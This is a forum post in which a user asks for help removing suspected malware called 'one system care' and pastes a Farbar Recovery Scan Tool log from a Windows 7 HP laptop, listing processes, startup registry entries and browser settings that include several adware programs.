Hi, I just recently came across, "one system care". I didn't recognize it and it didn't look right. I can't attribute any problems to it but when I started to check it out I saw it was a type of malware I shouldn't try and remove myself, and recommended geeks to go for help in removing it. I would appreciate any help i can get. Thank you in advance.
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:09-01-2015
Ran by Charlie (administrator) on CHARLIE-SILVER (10-01-2016 12:43:19)
Running from C:\Users\Charlie\Downloads
Loaded Profiles: Charlie (Available Profiles: Charlie)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Softex Inc.) C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe
(Logitech Inc.) C:\Program Files (x86)\Common Files\logishrd\LVMVFM\UMVPFSrv.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Windows ® Win 7 DDK provider) C:\Program Files (x86)\Bluetooth Suite\AdminService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(Mindspark) C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65barsvc.exe
(Garmin Ltd or its subsidiaries) C:\Program Files (x86)\Garmin\Core Update Service\Garmin.Cartography.MapUpdate.CoreService.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\mcsacore.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(SMART Technologies) C:\Program Files (x86)\SMART Technologies\Education Software\SMARTHelperService.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Validity Sensors, Inc.) C:\Windows\System32\valWBFPolicyService.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Atheros) C:\Program Files (x86)\Bluetooth Suite\Ath_CoexAgent.exe
(McAfee, Inc.) C:\Program Files\mcafee\MSC\McAPExe.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\SystemCore\mfefire.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
(Qualcomm®Atheros®) C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe
(Hewlett-Packard Co.) C:\Program Files\HP\HP Officejet Pro 8600\Bin\ScanToPCActivationApp.exe
(Garmin Ltd or its subsidiaries) C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe
(ShopAtHome.com) C:\Users\Charlie\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeWatcher.exe
(ShopAtHome.com) C:\Users\Charlie\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeUpdater.exe
(Dropbox, Inc.) C:\Users\Charlie\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\office15\onenotem.exe
(Qualcomm Atheros) C:\Program Files (x86)\Bluetooth Suite\BtTray.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Hewlett-Packard Co.) C:\Program Files\HP\HP Officejet Pro 8600\Bin\HPNetworkCommunicator.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerSt.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe
(Hewlett-Packard) C:\Program Files (x86)\Hp\HP Software Update\hpwuschd2.exe
(Adobe Systems Inc.) C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\acrotray.exe
(Mindspark) C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\APPINTEGRATOR.EXE
(Mindspark) C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\AppIntegrator64.exe
(Logitech Inc.) C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe
(Apple Inc.) C:\Program Files (x86)\QuickTime\QTTask.exe
(SMART Technologies ULC) C:\Program Files (x86)\SMART Technologies\Education Software\FloatingTools.exe
(SMART Technologies) C:\Program Files (x86)\SMART Technologies\Education Software\SMARTNotification.exe
(SMART Technologies) C:\Program Files (x86)\SMART Technologies\Education Software\SMARTTrayIcon.exe
(SMART Technologies) C:\Program Files (x86)\SMART Technologies\Education Software\SMARTBoardService.exe
(SMART Technologies) C:\Program Files (x86)\SMART Technologies\Education Software\SMARTInk.exe
(Joyent, Inc) C:\Program Files (x86)\SMART Technologies\Education Software\sbsdk-server\SBWDKService.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(SMART Technologies) C:\Program Files (x86)\SMART Technologies\Education Software\Office\SMARTInk-SBSDKProxy.exe
(Microsoft Corporation) C:\Windows\System32\wisptis.exe
(SMART Technologies) C:\Program Files (x86)\SMART Technologies\Education Software\SMARTInkPrivilegedAccess.exe
(Logitech, Inc.) C:\Users\Charlie\AppData\Local\Logitech® Webcam Software\Logishrd\LU2.0\LULnchr.exe
(Logitech, Inc.) C:\Users\Charlie\AppData\Local\Logitech® Webcam Software\Logishrd\LU2.0\LogitechUpdate.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\CSP\1.8.203.0\McCSPServiceHost.exe
(McAfee, Inc.) C:\Program Files\mcafee\MAT\McPvTray.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\CommonBuild\McCBEntAndInstru.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
(Lavasoft Limited) C:\Program Files (x86)\Lavasoft\Web Companion\TcpService\2.3.4.7\LavasoftTcpService.exe
() C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.SearchProtect.WinService.exe
(Lavasoft) C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe
() C:\Program Files (x86)\Get-a-Clip\MFLService2.exe
() C:\Program Files (x86)\Get-a-Clip\mflstart.exe
(The Chromium Authors) C:\Program Files\FusionBrowser\1.265.1\chrome.exe
(The Chromium Authors) C:\Program Files\FusionBrowser\1.265.1\chrome.exe
(The Chromium Authors) C:\Program Files\FusionBrowser\1.265.1\chrome.exe
() C:\Program Files\WebUpdater\1.0.24.0\WebUpdater.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\cmd.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\McChHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\splwow64.exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7573208 2014-04-22] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2818800 2014-06-16] (Synaptics Incorporated)
HKLM\...\Run: [SimplePass] => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe [3962936 2014-03-28] (Hewlett-Packard)
HKLM\...\Run: [OPBHOBroker] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe [415288 2014-03-28] (Hewlett-Packard)
HKLM\...\Run: [OPBHOBrokerDesktop] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe [415288 2014-03-28] (Hewlett-Packard)
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel® USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2014-04-10] (Intel Corporation)
HKLM-x32\...\Run: [AccelerometerSysTrayApplet] => C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerST.exe [126240 2014-04-01] (Hewlett-Packard Company)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [581432 2014-06-09] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HPOSD] => C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe [379960 2011-08-19] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [96056 2013-05-30] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Adobe Acrobat Speed Launcher] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe [41360 2015-09-24] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe [840592 2015-09-24] (Adobe Systems Inc.)
HKLM-x32\...\Run: [FromDocToPDF EPM Support] => C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65medint.exe [12872 2015-02-11] (Mindspark)
HKLM-x32\...\Run: [FromDocToPDF AppIntegrator 32-bit] => C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\AppIntegrator.exe [225864 2015-02-11] (Mindspark)
HKLM-x32\...\Run: [FromDocToPDF AppIntegrator 64-bit] => C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\AppIntegrator64.exe [258632 2015-02-11] (Mindspark)
HKLM-x32\...\Run: [FromDocToPDF Search Scope Monitor] => "C:\PROGRA~2\FROMDO~2\bar\1.bin\65srchmn.exe" /m=2 /w /h
HKLM-x32\...\Run: [LWS] => C:\Program Files (x86)\Logitech\LWS\Webcam Software\LWS.exe [205336 2011-11-11] (Logitech Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2015-08-06] (Apple Inc.)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc.)
HKLM-x32\...\Run: [SMART Floating Tools] => C:\Program Files (x86)\SMART Technologies\Education Software\FloatingTools.exe [9024304 2013-11-20] (SMART Technologies ULC)
HKLM-x32\...\Run: [SMARTNotification] => C:\Program Files (x86)\SMART Technologies\Education Software\SMARTNotification.exe [204592 2014-02-12] (SMART Technologies)
HKLM-x32\...\Run: [SMART Tray Tools] => C:\Program Files (x86)\SMART Technologies\Education Software\SMARTTrayIcon.exe [744752 2014-02-12] (SMART Technologies)
HKLM-x32\...\Run: [SMART Board Service] => C:\Program Files (x86)\SMART Technologies\Education Software\SMARTBoardService.exe [1933616 2014-02-12] (SMART Technologies)
HKLM-x32\...\Run: [sbsdk-server] => C:\Program Files (x86)\SMART Technologies\Education Software\sbsdk-server\NodeLauncher.exe [62768 2013-08-22] (SMART Technologies)
HKLM-x32\...\Run: [SMART Ink] => C:\Program Files (x86)\SMART Technologies\Education Software\SMARTInk.exe [147248 2014-02-11] (SMART Technologies)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [597040 2015-10-06] (Oracle Corporation)
HKLM-x32\...\Run: [mflstart] => C:\Program Files (x86)\Get-a-Clip\mflstart.exe [116208 2016-01-10] ()
HKLM\...\Policies\Explorer\Run: [BtvStack] => C:\Program Files (x86)\Bluetooth Suite\BtvStack.exe [132736 2013-11-29] (Qualcomm®Atheros®)
HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [HP Officejet Pro 8600 (NET)] => C:\Program Files\HP\HP Officejet Pro 8600\Bin\ScanToPCActivationApp.exe [2573416 2012-10-17] (Hewlett-Packard Co.)
HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [GoogleChromeAutoLaunch_A705C234CC82E085351B039A63375E0A] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [741704 2015-12-10] (Google Inc.)
HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [Adobe Acrobat Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\AdobeCollabSync.exe [1104288 2015-09-24] (Adobe Systems Incorporated)
HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [GarminExpressTrayApp] => C:\Program Files (x86)\Garmin\Express Tray\ExpressTray.exe [688984 2015-01-28] (Garmin Ltd or its subsidiaries)
HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [Dropbox Update] => C:\Users\Charlie\AppData\Local\Dropbox\Update\DropboxUpdate.exe [134512 2015-06-30] (Dropbox, Inc.)
HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [ShopAtHomeWatcher] => C:\Users\Charlie\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeWatcher.exe [130232 2015-07-29] (ShopAtHome.com)
HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [ShopAtHomeUpdater] => C:\Users\Charlie\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeUpdater.exe [199864 2015-07-29] (ShopAtHome.com)
HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [Web Companion] => C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanion.exe [1445648 2016-01-10] (Lavasoft)
HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [FusionBrowser] => C:\Program Files\FusionBrowser\1.265.1\chrome.exe [622848 2015-12-02] (The Chromium Authors)
AppInit_DLLs-x32: mfllib.dll => No File
ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Charlie\AppData\Roaming\Dropbox\bin\DropboxExt64.28.dll [2015-12-08] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2015-12-18] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2015-12-18] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2015-12-18] (Microsoft Corporation)
Startup: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2015-12-11]
ShortcutTarget: Dropbox.lnk -> C:\Users\Charlie\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
Startup: C:\Users\Charlie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk [2014-12-23]
ShortcutTarget: Send to OneNote.lnk -> C:\Program Files\Microsoft Office 15\root\office15\onenotem.exe (Microsoft Corporation)
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Winsock: Catalog9 01 C:\Windows\SysWOW64\LavasoftTcpService.dll [345360 2016-01-10] (Lavasoft Limited)
Winsock: Catalog9 02 C:\Windows\SysWOW64\LavasoftTcpService.dll [345360 2016-01-10] (Lavasoft Limited)
Winsock: Catalog9 03 C:\Windows\SysWOW64\LavasoftTcpService.dll [345360 2016-01-10] (Lavasoft Limited)
Winsock: Catalog9 04 C:\Windows\SysWOW64\LavasoftTcpService.dll [345360 2016-01-10] (Lavasoft Limited)
Winsock: Catalog9 16 C:\Windows\SysWOW64\LavasoftTcpService.dll [345360 2016-01-10] (Lavasoft Limited)
Winsock: Catalog9-x64 01 C:\Windows\system32\LavasoftTcpService64.dll [425744 2016-01-10] (Lavasoft Limited)
Winsock: Catalog9-x64 02 C:\Windows\system32\LavasoftTcpService64.dll [425744 2016-01-10] (Lavasoft Limited)
Winsock: Catalog9-x64 03 C:\Windows\system32\LavasoftTcpService64.dll [425744 2016-01-10] (Lavasoft Limited)
Winsock: Catalog9-x64 04 C:\Windows\system32\LavasoftTcpService64.dll [425744 2016-01-10] (Lavasoft Limited)
Winsock: Catalog9-x64 16 C:\Windows\system32\LavasoftTcpService64.dll [425744 2016-01-10] (Lavasoft Limited)
Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62
Tcpip\..\Interfaces\{3A7624B7-0B52-4931-9EE9-C9C86582159C}: [DhcpNameServer] 209.18.47.61 209.18.47.62
Tcpip\..\Interfaces\{9381EA84-12A1-427D-AC6D-5FDEA744A58D}: [DhcpNameServer] 40.20.1.201 40.20.1.202
Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT13/1
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT13/1
HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com/?pc=COSP&ptag=D011016-A880FF2AB0987464788F&form=CONMHP&conlogo=CT3332041
HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT13/1
URLSearchHook: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 - (No Name) - {4c60e5ab-5c68-4c59-abaa-885010b24b32} - C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65SrcAs.dll (Mindspark)
SearchScopes: HKLM -> {59AB8580-D8C1-4DDA-A77F-0B6CA73510AF} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKLM-x32 -> {59AB8580-D8C1-4DDA-A77F-0B6CA73510AF} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKLM-x32 -> {9a216821-0ec5-49a3-85ac-fb72ae79a1e8} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^Y6^xdm003^YYA^us&si=CPTqgNak28MCFYNDaQodFm0ArQ&ptb=C7B3E8DB-D9F3-4E0E-ACA1-5E7ACDA2DFF2&ind=2015021120&n=781ac840&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?pc=COSP&ptag=D011016-A880FF2AB0987464788F&form=CONBDF&conlogo=CT3332041&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?pc=COSP&ptag=D011016-A880FF2AB0987464788F&form=CONBDF&conlogo=CT3332041&q={searchTerms}
SearchScopes: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 -> {219102B8-E04D-4B03-8893-C16BC58F8C2A} URL = hxxps://search.yahoo.com/search?fr=mcafee&type=C011US0D20151117&p={searchTerms}
SearchScopes: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 -> {59AB8580-D8C1-4DDA-A77F-0B6CA73510AF} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 -> {9a216821-0ec5-49a3-85ac-fb72ae79a1e8} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^Y6^xdm003^YYA^us&si=CPTqgNak28MCFYNDaQodFm0ArQ&ptb=C7B3E8DB-D9F3-4E0E-ACA1-5E7ACDA2DFF2&ind=2015021120&n=781ac840&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 -> {AC00135D-B960-42EF-871F-3C8F42450A63} URL = hxxp://isearch.shopathome.com?user_id={a862d772-5a24-42bb-8804-35868a911247}&q={searchTerms}
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2015-12-18] (Microsoft Corporation)
BHO: Advertising Cookie Opt-out -> {8E425EB4-ADBD-4816-B1E8-49BB9DECF034} -> C:\Program Files\Google\Advertising Cookie Opt-out\opt_out.dll [2013-01-10] (Google Inc)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\URLREDIR.DLL [2015-12-18] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2015-12-18] (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll => No File
BHO-x32: Adobe PDF Reader Link Helper -> {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll [2012-09-23] (Adobe Systems Incorporated)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll [2015-12-18] (Microsoft Corporation)
BHO-x32: SMART Notebook Download Utility -> {67BCF957-85FC-4036-8DC4-D4D80E00A77B} -> C:\Program Files (x86)\SMART Technologies\Education Software\NotebookPlugin.dll [2013-11-27] (SMART Technologies ULC.)
BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\ssv.dll [2016-01-01] (Oracle Corporation)
BHO-x32: Advertising Cookie Opt-out -> {8E425EB4-ADBD-4816-B1E8-49BB9DECF034} -> C:\Program Files (x86)\Google\Advertising Cookie Opt-out\opt_out.dll [2013-01-10] (Google Inc)
BHO-x32: Toolbar BHO -> {a235e1e3-6296-4710-af39-104a7faa6c7c} -> C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65bar.dll [2015-02-11] (Mindspark)
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2015-09-24] (Adobe Systems Incorporated)
BHO-x32: MFLHelper Class -> {B0932222-51E2-47D1-A4EF-CB10AE7DF086} -> C:\Program Files (x86)\Get-a-Clip\MFLPluginIE.dll [2016-01-10] (Get-a-Clip)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL [2015-12-18] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2015-12-18] (Microsoft Corporation)
BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_65\bin\jp2ssv.dll [2016-01-01] (Oracle Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2015-10-19] (Hewlett-Packard Company)
BHO-x32: Search Assistant BHO -> {f236ca79-3123-4afb-9f74-e98117ad5625} -> C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65SrcAs.dll [2015-02-11] (Mindspark)
